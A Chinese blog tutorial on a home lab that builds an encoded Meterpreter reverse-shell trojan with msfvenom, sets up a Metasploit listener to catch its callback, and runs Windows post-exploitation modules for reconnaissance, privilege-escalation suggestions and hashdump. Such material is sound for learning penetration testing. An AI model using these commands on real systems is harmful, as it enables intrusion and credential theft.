后渗透学习之Metasploit的post模块使用信息收集

最新推荐文章于 2023-01-10 10:41:26 发布
最新推荐文章于 2023-01-10 10:41:26 发布
阅读量2.9k 收藏 6
点赞数 6
分类专栏: 后渗透、内网学习 文章标签: 渗透 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/104442503
版权
环境

Kali和win7是nat连接 Kali:192.168.10.145 Win7:192.168.10.143
如果Msf拿shell后出现乱码,输入chcp 65001即可

MSF的post模块

进入msf5 > search post,搜索post模块,发现有471个模块可使用,我挑一部分出来翻译大概看看是用来干嘛的

  • Linux:
    在这里插入图片描述
  • Window:
    在这里插入图片描述
首先得拿一个cmd的shell,步骤如下:

Msf制作木马

`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.145 LPORT=1234 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe`

在这里插入图片描述在root目录下生成msf.exe文件
在这里插入图片描述
然后msf使用exploit/multi/handler模块设置监听

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

msf5 exploit(multi/handler) > set lhost 192.168.10.145
lhost => 192.168.10.145                                                               
msf5 exploit(multi/handler) > set lport 1234                                          
lport => 1234

然后执行脚本
在这里插入图片描述
kali另开命令框开启http服务

root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

在win7上下载exe文件
在这里插入图片描述
然后执行运行,kali这边就会得到一个shell
在这里插入图片描述
当然了,我这边win7设置的是超级管理员的账号,所以直接就是最高权限了。
在这里插入图片描述

后渗透信息收集:

获取目标机器的分区情况:

meterpreter > run post/windows/gather/forensics/enum_drives

在这里插入图片描述
判断目标机是否为虚拟机:

`meterpreter > run post/windows/gather/checkvm`

在这里插入图片描述
查看目标机开启哪些服务

meterpreter > run post/windows/gather/enum_services

在这里插入图片描述查看目标机安装了哪些应用、补丁

meterpreter > run post/windows/gather/enum_applications

在这里插入图片描述
查看目标机最近的操作

meterpreter > run post/windows/gather/dumplinks

在这里插入图片描述

post的提权模块

如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能

post/multi/recon/local_exploit_suggester

在这里插入图片描述
当然还有很多好玩的,比如说屏幕监控 run vnc,hashdump查询密码等等操作
在这里插入图片描述

总结

  • Msf制作木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.145 LPORT=1234 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe
  • 然后msf使用exploit/multi/handler模块设置监听
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  • 获取目标机器的分区情况:
meterpreter > run post/windows/gather/forensics/enum_drives
  • 判断目标机是否为虚拟机:
  meterpreter > run post/windows/gather/checkvm
  • 查看目标机开启哪些服务
 meterpreter > run post/windows/gather/enum_services
  • 查看目标机安装了哪些应用、补丁
meterpreter > run post/windows/gather/enum_applications
  • 查看目标机最近的操作
meterpreter > run post/windows/gather/dumplinks`
  • 如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能
  post/multi/recon/local_exploit_suggester
努力的学渣'#
关注
专栏目录
metasploit渗透框架使用说明——后面介绍后渗透模块和网络渗透
记录并分享学习安全的知识点..
01-04 1065
一、模块划分 MSF是渗透测试领域最流行的渗透测试框架,它有以下几个模块:辅 助 模 块 (Auxiliary,扫描器)——扫描主机系统,寻找可用漏洞;渗透攻击模块 (Exploits)——选择并配置一个漏洞利用模块;攻击载荷模块 (Payloads)——选择并配置一个攻击载荷模块;后渗透攻击模块 (Post)——用于内网渗透的各种操作;编 码 器 模 块 (Encoders)——选择编码技术,绕过杀软(或其他免杀方式);; 所有模块位置:/usr/share/metasploit-framework/m
kali metasploit渗透Post模块
qq_51685718的博客
10-28 418
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
metasploit - post
Nixawk
04-20 1854
msf > use post/ use post/aix/hashdump use post/cisco/gather/enum_cisco use post/firefox/gather/cookies use post/firefox/gather/history use post/firefox/gather/passwords use post/firefox/gather/xss use
MetasploitPost Exploitation
公众号shadow sock7
06-17 1760
参考: https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/autoroute这个很重要啊! The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to
Metasploit -- 后渗透模块(POST)
weixin_41489908的博客
03-01 953
​给时间一点时间,让过去过去,让开始开始。。。 ---- 网易云热评 作用:获取目标主机后shell后,继续信息收集,提权 1、获取目标分区情况 run post/windows/gather/forensics/enum_drives 2、检测是否是虚拟主机 run post/windows/gather/checkvm 3、获取当前安装的应用程序 runpost/windows/gather/enum_applications 4、获取用户登录信息 run post/..
metasploit-学习7--显示post模块的所有post信息
简单就是美
06-15 7401
不好意思,由于本文太长,我用程序生成此博文的锚点链接,可是一发布就没有。是不是csdn不支持锚点,还是我操作错误。在这里给大家带来的不便,还请见谅!  Name                                             Disclosure Date  Rank    Description    ----
Metasploit渗透模块开发-三米前有蕉皮1
08-03
Metasploit渗透模块开发详解》 Metasploit,作为一个强大的安全测试框架,其后渗透模块的开发对于渗透测试人员来说是一项至关重要的技能。本文将深入探讨如何为Metasploit开发后渗透模块,以及如何将传统的...
metasploit-modules:我的metasploit模块
05-23
5. **Post**:后渗透阶段的模块,用于在成功获得目标系统访问权限后执行的任务,如权限提升、数据收集等。 使用Metasploit模块时,通常需要配置模块参数,如目标IP地址、端口、利用选项等,然后运行框架执行模块。...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
Metasploit使用并不止于攻击,它同样包含了大量的后渗透工具,这些工具在取得目标系统控制权后,可以进行进一步的侦察、信息收集和横向移动,以模拟黑客可能的行为。这些功能使得Metasploit成为一个全面的渗透测试...
metasploit post模块介绍
星落的博客
05-26 1万+
post模块介绍 通过run或bgrun进行调用,对目标系统进行入侵。 实例演示 1.对目标网络进行arp扫描 run post/windows/gather/arp_scanner 2.检验目标是否为虚拟机 run post/windows/gather/checkvm 3.枚举应用 run post/windows/gather/enum_applications 4.枚举登录用户 run post/windows/gather/enum_logged_on_users
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4405
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
12、后渗透测试--meterpreter使用
无痕的博客
12-13 1309
metasploit渗透阶段meterpreter命令
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
Metasploit基础和命令的使用
w1304099880的博客
03-19 1342
Metasploit基础Metasploit是什么?渗透测试是干什么的?Metasploit基础命令 Metasploit是什么? Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个
初探Meterpreter
要不,单步调试走起?
12-06 1万+
强大的Meterpreter,让目标机像你的孩子一样听话~~
Meterpreter Post-Exploitation分析
爱测未来团队博客
08-09 2280
Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。
meterpreter详解与渗透实战
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
Msf后渗透测试阶段_POST模块
最新发布
分享学习网络的点点滴滴
01-10 303
【代码】Msf后渗透测试阶段_POST模块
初探metasploit--主要架构及常用功能
attack_eg的博客
08-27 7463
1.metasploit 架构 (http://www.cnblogs.com/blacksunny/p/5254904.html) 六个模块: 一.渗透攻击模块(exploit):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击的代码 (1)主动渗透模块(服务端渗透) (2)被动渗透模块(客户端渗透) 二.辅助模块(Aux):实现信息收集及口令猜测、Do
Metasploit框架详解:使用模块解析
- **后渗透攻击模块Post)**:在成功渗透后执行的任务,如权限提升、数据窃取等。 - **攻击载荷模块(Payloads)**:用于在目标系统上执行的代码,可以是简单的命令执行或复杂的持久化木马。 - **空指令模块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值